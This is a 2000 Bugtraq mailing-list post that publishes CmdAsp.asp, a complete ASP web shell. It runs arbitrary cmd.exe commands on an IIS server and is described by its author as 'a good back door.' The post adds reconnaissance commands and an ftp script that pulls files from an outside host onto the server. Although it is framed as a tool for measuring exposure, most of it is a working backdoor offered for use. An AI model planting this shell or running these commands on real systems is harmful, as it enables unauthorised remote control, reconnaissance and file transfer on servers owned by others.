From: Maceo [maceo@DOGMILE.COM]
Sent: Tuesday, December 12, 2000 3:46 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: CmdAsp.asp - What's your exposure?

SUMMARY

CmdAsp.asp - an interactive ASP page command prompt. Check out
how vulnerable your IIS web server is to the IUSR_COMPUTER and
IWAM_COMPUTER user accounts.  Runs in the context of the web
server as a standard ASP page. Makes a good back door to any IIS
web server.


COMMENTS

Part of securing an IIS web server is understanding your exposure to
operations performed by IUSR_COMPUTER and IWAM_COMPUTER user accounts
and locking them down. The accounts which IIS will execute scripts
such as ASP or Perl. These accounts are one of your first defenses
in securing your web server. In thinking about security on your IIS
web server it is important to note that these accounts belong to the
Everyone group.

I have put together an interactive ASP page for executing cmd.exe
operations. The cmd process, as the ASP page, will execute in the
context of the web server.  Using this utility, it makes it easier to
assess your exposure to these user accounts.  As recent IIS
vulnerabilities have shown, these accounts can do some real damage to
your system. (BugtraqID 1912)

Many times a common response to web site defacement is that it is
harmless. As everyone on this list should know, this is not the case.
My hope is that sharing this code will help administrators better
understand the exposure when a remote user can create or alter an
arbitrary ASP or script files in your web root.

It should be noted that this script assumes that IUSR_COMPUTER can
write to the root directory "c:\".  This is true for default NT/2000
installs and should be one of the first things that you rectify in
securing your web server.  However, it is not a requirement that this
script can write to the file system to execute commands. It is only
a requirement for viewing the piped output of the commands.


Some example commands to get you started:
Gather some information:

netstat -a
ipconfig -all
ver
set
net users
net localgroup
net view
net accounts
net share
net start
ping 10.1.0.1


Need a file?  Grab it from your favorite ftp site:

echo OPEN 10.0.2.0 > c:\ftp.txt & vol
echo USER anonymous hacked@yourcompany.com >> c:\ftp.txt & vol
echo GET myfile >> c:\ftp.txt & vol
echo BYE >> c:\ftp.txt & vol
cd c:\ & ftp -n -s:c:\ftp.txt
del c:\ftp.txt


Use your imagination...

  -Maceo



<++ CmdAsp.asp ++>
<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>
<-- CmdAsp.asp -->